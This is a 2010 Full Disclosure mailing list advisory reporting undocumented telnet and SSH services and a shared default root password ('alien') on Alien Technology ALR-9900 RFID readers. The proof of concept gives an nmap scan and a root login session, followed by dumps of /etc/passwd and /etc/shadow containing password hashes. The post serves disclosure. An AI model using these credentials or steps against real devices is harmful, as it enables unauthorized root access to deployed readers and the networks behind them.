Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

AlienTechnology ALR-9900 default root password and backdoor

From: alien_technology () hush com
Date: Tue, 04 May 2010 15:59:34 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tested:
        www.alientechnology.com/readers/alr9900.php

Background:
        Alien Technology is a major rfid-reader designer and manufacturer.
 Alien's products are sold to many corporations and the military.
Alien's readers can be interfaced with in several ways including:
serial, IO Port and Ethernet port.  Alien has several daemons
running on their reader that accessible through Ethernet and
completely undocumented.  We called Alien several times to ask them
about these undocumented services and were first deferred to
technical support and then had our numbers blocked.  We then
emailed them about the security ramifications of these daemons and
received no reply.

The Undocumented:
        port 2323 - telnetd
        port 23 - telnetd
        port 22 - sshd

The Flaws:
        default root password = 'alien'
        alien account has same password across all readers
        port 2323 - provides a backdoor onto the readers for anyone who
knows the alien (or root) account password
        port 23  - ""
        port 22 - ""

The P.O.C:
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific
Daylight Time

Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports

PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
111/tcp  open  rpcbind
2323/tcp open  unknown

MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds


login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien

Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@alien-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)

root@alien-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The
Alien,18220,,:/home/alien:/bin/bash

root@alien-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::

Impact:
        Alien's readers are deployed in many secure facilities with
typically closed networks.  Although these networks are closed,
these undocumented services could allow employees to modify reader
settings and subvert checkout systems.  These checkout systems are
often used to track valuable items making such vulnerabilities a
serious matter. If these readers are deployed on an open or large
network they provide an easy way to tunnel into the network or
attack it from an unexpected location.  Lastly, if someone cracks
the alien account's password hash they get to use Alien's backdoor.

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc
0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN
Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8
ZXExxzM=
=Bb1k
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: